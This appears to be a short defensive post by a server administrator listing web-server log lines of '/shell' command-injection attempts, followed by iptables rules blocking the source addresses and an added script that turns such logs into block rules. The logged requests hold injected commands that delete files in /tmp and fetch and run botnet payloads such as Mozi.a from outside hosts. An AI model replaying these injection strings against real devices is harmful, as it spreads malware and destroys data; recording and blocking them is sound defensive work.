List of IPs carrying out GET /shell attacks

Here is the list:

61.242.40.137 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.45.11.127 - - [31/May/2021:06:52:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.45.11.127:48083/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
182.121.231.1 - - [21/May/2021:04:07:59 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://182.121.231.1:59816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [21/May/2021:14:34:29 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
223.149.149.208 - - [21/May/2021:22:16:38 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
103.203.72.91 - - [20/May/2021:06:12:05 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
119.123.236.177 - - [20/May/2021:15:52:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.123.236.177:38918/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
117.241.51.177 - - [18/May/2021:17:30:58 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.241.51.177:45448/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.5.37.175 - - [18/May/2021:19:41:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.5.37.175:46657/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
59.97.193.131 - - [17/May/2021:06:05:42 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.97.193.131:57363/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
138.204.132.98 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://212.192.241.127/eb0t.sh;chmod+777+/tmp/eb0t.sh;sh+/tmp/eb0t.sh" 400 0 "-" "-"
59.63.206.200 - - [26/May/2021:00:59:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://101.232.115.188:57082/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
114.33.156.230 - - [26/May/2021:09:57:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://114.33.156.230:59246/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
68.150.109.112 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"
209.141.33.232 - - [25/May/2021:02:00:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:03:15:26 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:05:17:24 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [23/May/2021:11:11:12 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [22/May/2021:12:33:25 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"

Note that the IP 45.14.149.244 is in Romania and 27.45.11.127 is in China.

Result:

iptables -A INPUT -s 45.14.149.244 -j DROP
iptables -A INPUT -s 209.141.33.232 -j DROP
iptables -A INPUT -s 68.150.109.112 -j DROP
iptables -A INPUT -s 114.33.156.230 -j DROP
iptables -A INPUT -s 59.63.206.200 -j DROP
iptables -A INPUT -s 59.97.193.131 -j DROP
iptables -A INPUT -s 117.241.51.177 -j DROP
iptables -A INPUT -s 119.123.236.177 -j DROP
iptables -A INPUT -s 27.5.37.175 -j DROP
iptables -A INPUT -s 27.45.11.127 -j DROP
iptables -A INPUT -s 61.242.40.137 -j DROP
iptables -A INPUT -s 182.121.231.1 -j DROP
iptables-save > /etc/iptables/rules.v4
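
The rule list above can be derived from the access log instead of being typed by hand. The script below is an added example, not part of the original post: it assumes the combined log format shown above, and the function names (`sample_log`, `shell_sources`, `payload_hosts`, `block_rules`) and the sample lines (documentation address ranges) are constructed for illustration.

```shell
#!/bin/sh
# Added example: derive block-list candidates from a combined-format access log.

# Constructed sample lines (documentation address ranges, not real hosts).
sample_log() {
cat <<'EOF'
203.0.113.10 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://203.0.113.10:8088/sample.a;chmod+777+sample.a;/tmp/sample.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
198.51.100.7 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;wget+http:/\\/192.0.2.44/arm7;chmod+777+arm7;./arm7+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
198.51.100.7 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;wget+http:/\\/192.0.2.44/arm7;chmod+777+arm7;./arm7+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
203.0.113.99 - - [21/May/2021:14:00:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.23 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;wget+192.0.2.80/bins/sample.x86;chmod+777+/tmp/sample.x86 HTTP/1.1" 404 488 "-" "Hello, world"
EOF
}

# Client IPs that requested /shell, checked as dotted-quad before use in a rule.
shell_sources() {
  awk '$6 == "\"GET" && $7 ~ /^\/shell\?/ &&
       $1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ { print $1 }' | LC_ALL=C sort -u
}

# Hosts named in the injected wget: http://, the escaped http:/\\/ form, or no scheme.
payload_hosts() {
  awk '$6 == "\"GET" && $7 ~ /^\/shell\?/ {
    n = split($7, cmd, ";")
    for (i = 1; i <= n; i++) {
      if (cmd[i] !~ /^wget\+/) continue
      h = cmd[i]
      sub(/^wget\+/, "", h)            # drop the command name
      sub(/^https?:[\/\\]+/, "", h)    # drop the scheme, escaped or not
      sub(/[:\/].*$/, "", h)           # drop port and path
      if (h ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) print h
    }
  }' | LC_ALL=C sort -u
}

# Print (do not execute) one DROP rule per address read on stdin, for review.
block_rules() {
  while read -r ip; do
    printf 'iptables -A INPUT -s %s -j DROP\n' "$ip"
  done
}

sample_log | shell_sources | block_rules
```

A payload host only appears inside the URL, so an INPUT rule on it matches nothing unless that host also connects as a client; review the `payload_hosts` output separately, since it can contain private addresses such as the 192.168.1.1 seen in the log above.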

Misery.
